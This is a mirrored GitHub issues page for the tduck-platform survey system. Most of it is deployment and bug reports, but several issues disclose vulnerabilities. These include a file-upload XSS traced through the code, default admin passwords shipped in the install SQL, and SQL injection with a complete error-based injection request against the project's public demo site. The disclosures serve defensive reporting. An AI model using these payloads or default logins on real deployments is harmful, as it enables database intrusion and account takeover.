tduckcloud / tduck-platform Goto Github PK
View Code? Open in Web Editor NEWA questionnaire system that can be privatized and deployed - 填鸭表单问卷系统(tduck-survey-form)
Home Page: https://www.tduckcloud.com
License: MIT License
tduck-platform's People
Contributors
Stargazers
Watchers
Forkers
tduck666 mintonmu nigulasifenhongma davidalphafox charlessong a-jiang netgeo zhblue5 zhiyang4cn zgqg musknine chenrongxu daozi7272 jinlongchen cavinhuang windymuse codebyteme wangcongxing kioco kamibababa erickwang huadis shiningwhh jjzzorg berg-1 hello-abc yanweibing fengrk kiretyo xycpand tanbinh123 cnnf blind-bird wang-shun galenzhao xmsdn yunhaicaomei zhangle-java-code chenhong231 yorkmass hcy1996 ashq3 aoyamaliu 17664206081 wangbaochao heguangwu swmwlm chengwengao wangrui93lx oxcz mayong82 jamezhan x-xk halobug happyong0815 torns jiamingglyy annacode747 lizhongnian rhymedys ddragonbean hhvic dannyfund shinejstar tduckboot heyshoop p7xxtmx souldike doushuo winteriscome itsharex jiabingh 8-diagrams hadoop835 pureusername little-kangaroo winneryj blues47 vvrfxyz andy1199 gcjer9 9527-bit yangyuanqi1266 wmlunge lovebugss bobokingbao iq-scm caszhou scale1932 lanrxf yangmingyuan380 sun-sso liueast ymxfl gitlin2018 libaibaia wysxr zhonghaibin steptian tsirtvtduck-platform's Issues
访问的时候spring boot提示s.w.s.m.m.a.RequestMappingHandlerMapping : Mapped to org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#errorHtml(HttpServletRequest, HttpServletResponse)
spring boot提示:
s.w.s.m.m.a.RequestMappingHandlerMapping : Mapped to org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#errorHtml(HttpServletRequest, HttpServletResponse)
前台访问是404错误
curl访问,没有任何提示
小建议
建议大神把业务逻辑写service里,不然没有事务呢。
小提议-已填写的问卷无打印功能
已填写完问卷后,如果有可以打印的功能,就完美了
文件上传导致的xss && 内置账号默认账号密码登录导致的后台接管
任意文件上传导致的xss
根据经验和名字,这个类基本上就是一个通用类,统一作为文件上传功能的接口,如果能上传上去,可能会有执行权限的风险,在阅读了一部分的springboot的文档后发现如下
首先进入avatar函数,这个函数会接收名为file的数据并赋值到file中,文件类型是[MultipartFile](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/multipart/MultipartFile.html),是springboot接受文件内容的类。
**随后进入37行,这里对目标path进行了赋值,问题也出在这里。file.getOriginalFilename()获取到我们上传文件的全部名称。FileUtil.extName,获取到了我们上传文件的后缀。使用随机值作为名字。赋值给了path。这里后缀我们可控。**也是这个漏洞的核心点
String path = IdUtil.simpleUUID() + '.' + FileUtil.extName(file.getOriginalFilename());
接下来进入到处理文件的代码,38行。调用了OssStorageFactory.getStorageService()方法,我们进入这个方法中,简单判断下默认属性,进入到build()函数中,主要看build函数,点击跳进去。
前面先对config进行了赋值,同时对上传文件的属性进行了判断,支持云上传。如果没有配置,那么直接进入后面的else判断。上传文件到本地。
首先进入44行,创建一个ApplicationHome类,给config分别赋值Domain和UploadFolder。随后创建一个LocalStorageService类并返回。随后回到最开始的OssStorageFactory.getStorageService().upload(file.getInputStream(), path),这里的LocalStorageService是OssStorageFactory的实现类,进入LocalStorageService的upload方法,如下所示:
接收传过来的文件的流和path,23行对目标进行设置文件路径,以path结尾,这里path前面进行了名称重命名,所以无法进行目录穿越。但是文件这时已经传上去了,对后缀并未进行检测。随后返回数据。
至此,完成了文件上传,至于利用方式,当前只能传html,其他的不解析。
默认账号密码登录
去看安装文档就能知道,我们是直接下载sql数据库进行网站的安装的。根据官网提示,也是让我们直接创建一个数据库,随后导入这个sql文件,进行网站的搭建的。
这里会默认创建两个账号,一个是[email protected] , 另外一个是[email protected] 。其中[email protected]这个账号是管理员账号。这两个账号对应的密码为123456,12345678。均为hash加密。
鉴于这个sql文件是作为开发网站使用的sql,其中包含着网站相关的配置,一般开发者会直接使用默认账号密码进行配置。而不会是删除初始账号和密码
社区版支持导入功能吗
XSS vulnerability caused by file upload(tduck-platform4.0)
- Create a test form system
- After creating the form system, upload the HTML file, you can see that the request does not contain authentication information
- Background preview data execution script
使用docker-compose部署后无法访问呀
部署后访问报 502 无访问日志
tduck-platform |
tduck-platform | . ____ _ __ _ _
tduck-platform | /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
tduck-platform | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
tduck-platform | \\/ ___)| |_)| | | | | || (_| | ) ) ) )
tduck-platform | ' |____| .__|_| |_|_| |_\__, | / / / /
tduck-platform | =========|_|==============|___/=/_/_/_/
tduck-platform | :: Spring Boot :: (v2.7.8)
tduck-platform |
tduck-platform | 2023-04-14 15:09:13.527 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Starting TduckApiApplication using Java 1.8.0_272 on bf7cbaa2d908 with PID 9 (/application/BOOT-INF/classes started by root in /application)
tduck-platform | 2023-04-14 15:09:13.539 DEBUG 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Running with Spring Boot v2.7.8, Spring v5.3.25
tduck-platform | 2023-04-14 15:09:13.540 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : The following 1 profile is active: "prod"
tduck-platform | 2023-04-14 15:09:13.568 INFO 9 --- [kground-preinit] o.h.validator.internal.util.Version : HV000001: Hibernate Validator 6.2.5.Final
tduck-platform | 2023-04-14 15:09:15.321 INFO 9 --- [ main] .s.d.r.c.RepositoryConfigurationDelegate : Bootstrapping Spring Data MongoDB repositories in DEFAULT mode.
tduck-platform | 2023-04-14 15:09:15.346 INFO 9 --- [ main] .s.d.r.c.RepositoryConfigurationDelegate : Finished Spring Data repository scanning in 18 ms. Found 0 MongoDB repository interfaces.
tduck-platform | 2023-04-14 15:09:16.356 INFO 9 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8999 (http)
tduck-platform | 2023-04-14 15:09:16.370 INFO 9 --- [ main] o.a.coyote.http11.Http11NioProtocol : Initializing ProtocolHandler ["http-nio-8999"]
tduck-platform | 2023-04-14 15:09:16.371 INFO 9 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
tduck-platform | 2023-04-14 15:09:16.373 INFO 9 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.71]
tduck-platform | 2023-04-14 15:09:16.475 INFO 9 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
tduck-platform | 2023-04-14 15:09:16.476 INFO 9 --- [ main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 2805 ms
tduck-platform | 2023-04-14 15:09:16.736 WARN 9 --- [ main] n.sf.ehcache.config.CacheConfiguration : Cache 'eternal_cache' is set to eternal but also has TTI/TTL set. To avoid this warning, clean up the config removing conflicting values of eternal, TTI and TTL. Effective configuration for Cache 'eternal_cache' will be eternal='true', timeToIdleSeconds='0', timeToLiveSeconds='0'.
tduck-platform | _ _ |_ _ _|_. ___ _ | _
tduck-platform | | | |\/|_)(_| | |_\ |_)||_|_\
tduck-platform | / |
tduck-platform | 3.5.3
tduck-platform | 2023-04-14 15:09:18.944 INFO 9 --- [ main] com.zaxxer.hikari.HikariDataSource : DatebookHikariCP - Starting...
tduck-platform | 2023-04-14 15:09:19.205 INFO 9 --- [ main] com.zaxxer.hikari.HikariDataSource : DatebookHikariCP - Start completed.
tduck-platform | 2023-04-14 15:09:19.214 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : ==> Preparing: SELECT id,env_key,env_value,create_time,update_time FROM sys_env_config
tduck-platform | 2023-04-14 15:09:19.241 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : ==> Parameters:
tduck-platform | 2023-04-14 15:09:19.372 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : <== Total: 2
tduck-platform | 2023-04-14 15:09:20.165 INFO 9 --- [ main] .a.c.c.AjCaptchaServiceAutoConfiguration : 自定义配置项:
tduck-platform | AjCaptchaProperties{type=DEFAULT, jigsaw='', picClick='', waterMark='tduck', waterFont='WenQuanZhengHei.ttf', fontType='WenQuanZhengHei.ttf', slipOffset='5', aesStatus=true, interferenceOptions='0', cacheNumber='1000', timingClear='180', cacheType=local, reqFrequencyLimitEnable=false, reqGetLockLimit=5, reqGetLockSeconds=300, reqGetMinuteLimit=100, reqCheckMinuteLimit=100, reqVerifyMinuteLimit=100}
tduck-platform | 2023-04-14 15:09:20.169 INFO 9 --- [ main] c.a.c.s.impl.CaptchaServiceFactory : supported-captchaCache-service:[local]
tduck-platform | 2023-04-14 15:09:20.175 INFO 9 --- [ main] c.a.c.s.impl.CaptchaServiceFactory : supported-captchaTypes-service:[clickWord, default, blockPuzzle]
tduck-platform | 2023-04-14 15:09:20.200 INFO 9 --- [ main] com.anji.captcha.util.ImageUtils : 初始化底图:[SLIDING_BLOCK=[Ljava.lang.String;@30517a57, ORIGINAL=[Ljava.lang.String;@3dde5f38, PIC_CLICK=[Ljava.lang.String;@79ad1774]
tduck-platform | 2023-04-14 15:09:20.201 INFO 9 --- [ main] c.a.c.s.i.ClickWordCaptchaServiceImpl : --->>>初始化验证码底图<<<---clickWord
tduck-platform | 2023-04-14 15:09:20.374 INFO 9 --- [ main] c.a.c.s.i.ClickWordCaptchaServiceImpl : 初始化local缓存...
tduck-platform | 2023-04-14 15:09:20.493 INFO 9 --- [ main] com.anji.captcha.util.ImageUtils : 初始化底图:[SLIDING_BLOCK=[Ljava.lang.String;@33a47707, ORIGINAL=[Ljava.lang.String;@4d290757, PIC_CLICK=[Ljava.lang.String;@720a1fd0]
tduck-platform | 2023-04-14 15:09:20.495 INFO 9 --- [ main] c.a.c.s.i.BlockPuzzleCaptchaServiceImpl : --->>>初始化验证码底图<<<---blockPuzzle
tduck-platform | 2023-04-14 15:09:20.575 INFO 9 --- [ main] c.a.c.s.i.BlockPuzzleCaptchaServiceImpl : 初始化local缓存...
tduck-platform | 2023-04-14 15:09:20.834 INFO 9 --- [ main] c.tduck.cloud.api.config.JacksonConfig : 初始化 jackson 配置
tduck-platform | 2023-04-14 15:09:20.959 INFO 9 --- [ main] o.s.b.a.w.s.WelcomePageHandlerMapping : Adding welcome page: class path resource [static/index.html]
tduck-platform | 2023-04-14 15:09:21.162 ERROR 9 --- [ main] c.t.c.storage.cloud.OssStorageFactory : 更新存储配置失败:null
tduck-platform | 2023-04-14 15:09:23.152 INFO 9 --- [ main] o.a.coyote.http11.Http11NioProtocol : Starting ProtocolHandler ["http-nio-8999"]
tduck-platform | 2023-04-14 15:09:23.185 INFO 9 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat started on port(s): 8999 (http) with context path ''
tduck-platform | 2023-04-14 15:09:23.209 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Started TduckApiApplication in 10.366 seconds (JVM running for 10.822)
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock'
tduck-mysql | 2023-04-14T06:10:21.174903Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead.
tduck-mysql | 2023-04-14T06:10:21.176340Z 0 [Warning] [MY-010918] [Server] 'default_authentication_plugin' is deprecated and will be removed in a future release. Please use authentication_policy instead.
tduck-mysql | 2023-04-14T06:10:21.176374Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1
tduck-mysql | 2023-04-14T06:10:21.182663Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.
tduck-mysql | 2023-04-14T06:10:23.525901Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended.
tduck-mysql | 2023-04-14T06:10:24.646375Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.
tduck-mysql | 2023-04-14T06:10:24.646610Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.
tduck-mysql | 2023-04-14T06:10:24.749448Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory.
tduck-mysql | 2023-04-14T06:10:24.787622Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock
tduck-mysql | 2023-04-14T06:10:24.787883Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.
tduck-mysql | 2023-04-14T07:08:30.309381Z 0 [System] [MY-013172] [Server] Received SHUTDOWN from user <via user signal>. Shutting down mysqld (Version: 8.0.32).
tduck-mysql | 2023-04-14T07:08:32.310562Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 24 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.311031Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 25 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.311717Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 26 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312211Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 27 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312629Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 21 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312903Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 22 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.313388Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 23 user: 'root'.
tduck-mysql | 2023-04-14T07:08:34.007348Z 0 [System] [MY-010910] [Server] /usr/sbin/mysqld: Shutdown complete (mysqld 8.0.32) MySQL Community Server - GPL.
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock'
tduck-mysql | 2023-04-14T07:08:36.640496Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead.
tduck-mysql | 2023-04-14T07:08:36.641872Z 0 [Warning] [MY-010918] [Server] 'default_authentication_plugin' is deprecated and will be removed in a future release. Please use authentication_policy instead.
tduck-mysql | 2023-04-14T07:08:36.641903Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1
tduck-mysql | 2023-04-14T07:08:36.710657Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.
tduck-mysql | 2023-04-14T07:08:38.112355Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended.
tduck-mysql | 2023-04-14T07:08:39.256039Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.
tduck-mysql | 2023-04-14T07:08:39.256233Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.
tduck-mysql | 2023-04-14T07:08:39.389391Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory.
tduck-mysql | 2023-04-14T07:08:39.410490Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock
tduck-mysql | 2023-04-14T07:08:39.410632Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.
通过宝塔部署后访问出错
管理员用户报错添加用户报错
版本信息
是否是最新代码:是
演示环境是否有该问题?
演示环境地址:https://form.777nx.cn
提供你复现出该问题的演示环境地址
回显步骤
我操作了用户管理添加用户 然后出现了sql语句错误
报错信息 、截图 截图
Error updating database. Cause: com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1 ### The error may exist in com/tduck/cloud/account/mapper/UserMapper.java (best guess) ### The error may involve com.tduck.cloud.account.mapper.UserMapper.insert-Inline ### The error occurred while setting parameters ### SQL: INSERT INTO ac_user ( name, avatar, gender, phone_number, email, password, password_type, create_time, update_time ) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ? ) ### Cause: com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1 ; Data truncation: Data too long for column 'avatar' at row 1; nested exception is com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1
编辑器 上传图片异常
本地部署测试也是不行
SQL vulnerability in tduck-platform
- The code vulnerable to SQL injection is located as follows(com.tduck.cloud.form.service.data.FormDataMysqlService), This code directly concatenates SQL statements, leading to the SQL injection vulnerability
-
Then, within the downloadFormResultFile method of the downloadFormResultFile class(com.tduck.cloud.api.web.controller.downloadFormResultFile), this method is invoked.
-
According to the route information, access the URL address, and use error-based injection to retrieve the database name, thereby verifying the existence of the vulnerability.
[vulnerability] Back-office management statistics function sql injection in FormDataMysqlService.java (FormDataMysqlService.java 存在后管SQL注入漏洞)
1.Steps to reproduce (复现步骤)
1.Use the demo environment on the official website for authentication (https://demo.tduckapp.com/project) and register a user using the registration function ([email protected]/123456) (使用官网的demo环境进行验证(https://demo.tduckapp.com/project),使用注册功能注册一个用户([email protected]/123456))
2. Login and construct the following request, header in the Token replaced by the registered user login token, the parameter formKey value for malicious injection statement(登录并构造如下请求,header 中Token更换为注册的用户登录的token,参数formKey值为恶意注入语句)
POST /user/form/data/query?timestamp=1702986363697&sign=d40296262a3e99f608de2a9d7e435658 HTTP/1.1
Host: demo.tduckapp.com
Cookie: Hm_lvt_4dbdbc5421c41984499f878628d60f2f=1702985656; Hm_lpvt_4dbdbc5421c41984499f878628d60f2f=1702985890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyMTMyMSIsImlhdCI6MTcwMjk4NTg0NCwiZXhwIjoxNzAzNTkwNjQ0fQ.illpxfzf2O1AeJ3Ra3AHLgRufKgL9_KK1MAwfu0_l9C7GxSJT_ta9cDipGVWEhMijrS79N3lAksz7DgUzlhwUg
Content-Length: 122
Origin: https://demo.tduckapp.com
Referer: https://demo.tduckapp.com/project/form/data?key=MVWB25aE&active=data&type=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"authGroupId":null,"formKey":"MVWB25aE' or updatexml(1,concat(0x7e,user(),0x7e),1)='1","filter":{},"size":10,"current":0}
3. Generate sql error page and successfully display user(), the vulnerability is successfully verified.(产生sql报错页面并成功回显user(),漏洞验证成功)
2. Vulnerability Existence Source Code Analysis(漏洞存在源码分析)
FormDataMysqlService.java 中对应的search 方法,对request传入的formKey参数未做任何限制,直接拼接sql进行执行
3. affected version (受影响版本)
This sqli affects the latest version of the curren(v4.0)
4.fixes Recommendations (修复建议)
Using precompiled binding parameters(使用预编译绑定参数)
阿里云新创建的sms消息模板不兼容
//阿里云官方api参考:request.setTemplateParam("{"变量1":"值1","变量2":"值2","变量3":"值3"}")
request.setTemplateParam("{"name":"Tom", "code":"123"}");
error file AliyunSmsServiceImpl.java
error code line46 Map<String, Object> params = ImmutableMap.of("code", templateParams);
docker compose部署如何添加公众号和邮箱配置?
在部署文档里面没有看到介绍如何在docker里面添加参数配置邮箱和公众号,是否能告知一下,谢谢!
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.